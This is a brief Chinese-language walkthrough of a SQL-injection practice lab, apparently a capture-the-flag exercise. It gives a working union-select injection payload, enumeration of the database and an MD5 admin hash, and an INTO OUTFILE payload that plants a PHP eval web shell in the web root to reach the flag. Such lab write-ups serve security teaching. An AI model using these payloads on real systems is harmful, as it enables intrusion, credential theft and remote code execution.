sql靶场有个搜索框先点一下go,有回显说明存在漏洞
有个xss
然后在这里尝试sql注入
输入 -1' union select 1,2,3# 有回显可以查看数据库
然后查询数据库,用户
查询数据库的表名
查询它的数据这里admin用户的密码是md5加密
去解密看看
然后扫描ip目录发现没有后台登录的地方
有个phpinfo.php点进去可以看到路径
写入一句话木马访问
-1' union select 1,'<?php @eval($_POST[cmd]);?>',3 into outfile '/var/www/html/10.php' #
拿去连接成功
来到根目录有个flag
访问flag
